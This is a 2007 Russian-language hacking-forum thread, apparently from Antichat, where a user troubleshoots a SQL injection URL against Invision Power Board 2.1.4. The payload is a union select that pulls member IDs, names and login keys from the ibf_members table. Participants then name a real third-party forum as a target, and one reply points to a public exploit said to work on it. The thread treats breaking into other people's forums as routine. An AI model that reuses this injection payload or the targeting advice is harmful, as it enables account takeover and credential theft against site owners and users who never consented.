HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по Ipb
  #1  
Старый 26.03.2007, 18:18
AlexCRC
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100

Репутация: 9
По умолчанию Вопрос по Ipb

Эсть IPB 2.1.4
Уязвим.
Вот такая ссылка:
PHP код:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20%20WHERE%20id=1%20/* 
выдает цитату на 58 пост.
И все.
Префикс ibf_ (точно!
PHP код:
index.php?act=task&ck=
проверено =))) )

В чем может быть трабла?
 
Ответить с цитированием

  #2  
Старый 26.03.2007, 19:32
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Цитата:
Сообщение от AlexCRC  
Эсть IPB 2.1.4
Уязвим.
Вот такая ссылка:
PHP код:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20%20WHERE%20id=1%20/* 
Думаю оффтоп, но все-таки скажу в конце ссылки /* нету...
 
Ответить с цитированием

  #3  
Старый 26.03.2007, 19:36
AlexCRC
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100

Репутация: 9
По умолчанию

То я видимо часть не скопировал. она эсть.

Цитата:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666 ) union select 1,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(5 8),member_login_key),1,1,1,1,1,1,1,1,1 from ibf_members WHERE id=1 /*
 
Ответить с цитированием

  #4  
Старый 26.03.2007, 19:38
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Кинь ссылку в ПМ, посмотрю что можно сделать...
 
Ответить с цитированием

  #5  
Старый 26.03.2007, 20:07
AlexCRC
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100

Репутация: 9
По умолчанию

Проверил на другом форуме - тоже самое :'(

и еще на одном

Последний раз редактировалось AlexCRC; 26.03.2007 в 20:11..
 
Ответить с цитированием

  #6  
Старый 27.03.2007, 17:04
AlexCRC
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100

Репутация: 9
По умолчанию

идей нет?
 
Ответить с цитированием

  #7  
Старый 27.03.2007, 19:04
x_zStas_x
Новичок
Регистрация: 17.03.2007
Сообщений: 25
Провел на форуме:
94731

Репутация: 1
По умолчанию

дай ссылку на какой-нить форум!
 
Ответить с цитированием

  #8  
Старый 27.03.2007, 19:18
AlexCRC
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме:
60100

Репутация: 9
По умолчанию

к примеру http://www.gameforums.jino-net.ru
 
Ответить с цитированием

  #9  
Старый 27.03.2007, 19:43
x_zStas_x
Новичок
Регистрация: 17.03.2007
Сообщений: 25
Провел на форуме:
94731

Репутация: 1
По умолчанию

_ttp://www.milw0rm.com/exploits/2010
сполит с гуи канает на том просто лень инъекцию мутить
 
Ответить с цитированием

  #10  
Старый 30.03.2007, 12:55
Rosssi
Новичок
Регистрация: 13.03.2007
Сообщений: 11
Провел на форуме:
116353

Репутация: -2
По умолчанию

Цитата:
Сообщение от x_zStas_x  
_ttp://www.milw0rm.com/exploits/2010
сполит с гуи канает на том просто лень инъекцию мутить
Скажи плз что этот сплоит делает
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
скрипт распознавания форума genom-- Уязвимости CMS / форумов 22 31.12.2008 15:06
Уязвимости Ipb 2.1.6 - есть вопрос spheere Уязвимости CMS / форумов 0 27.05.2006 21:16



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.